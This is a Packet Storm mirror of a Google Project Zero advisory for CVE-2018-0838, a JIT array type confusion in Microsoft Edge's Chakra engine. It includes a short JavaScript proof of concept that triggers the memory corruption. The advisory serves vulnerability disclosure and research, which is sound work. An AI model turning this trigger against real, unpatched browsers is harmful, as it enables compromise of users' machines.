Microsoft Edge Chakra JIT NewScObjectNoCtor Array Type Confusion

2018-02-15T00:00:00
ID PACKETSTORM:146394
Type packetstorm
Reporter Google Security Research
Modified 2018-02-15T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: JIT: Array type confusion via NewScObjectNoCtor   
  
CVE-2018-0838  
  
  
This is similar to the previous issues 1457, <a href="/p/project-zero/issues/detail?id=1459" title="Microsoft Edge: Chakra: JIT: Array type confusion via Array.prototype.reverse" class="closed_ref" rel="nofollow"> 1459 </a>(MSRC 42551, MSRC 42552).  
  
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions which are not checked by CheckJsArrayKills.  
  
PoC:  
function inlinee() {  
  
}  
  
function opt(arr) {  
arr[0] = 1.1;  
new inlinee();  
arr[0] = 2.3023e-320;  
}  
  
function main() {  
let arr = [1.1];  
for (let i = 0; i < 10000; i++) {  
inlinee.prototype = {};  
opt(arr);  
}  
  
inlinee.prototype = arr;  
opt(arr);  
  
print(arr);  
}  
  
main();  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`